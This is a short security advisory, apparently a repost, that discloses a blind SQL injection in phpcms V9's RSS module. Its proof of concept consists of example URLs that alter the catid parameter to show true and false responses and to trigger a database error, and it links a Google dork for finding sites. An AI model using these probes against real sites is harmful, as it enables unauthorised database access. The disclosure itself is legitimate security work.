phpcms V9 BLind SQL Injection Vulnerability

2011.01.25
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

================================================================= phpcms V9 BLind SQL Injection Vulnerability ================================================================= Software: phpcms V9 Vendor: www.phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^ References: http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html ================================================================= exploit & p0c [!] index.php?m=content&c=rss&catid=[valid catid] Example p0c [!] http://host/index.php?m=content&c=rss&catid=10 <= True [!] http://host/index.php?m=content&c=rss&catid=-10 <= False [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table) ================================================================= Nothing Impossible In This World Even Nobody`s Perfect ================================================================= =========================| -=[ E0F ]=- |=========================

References:

http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top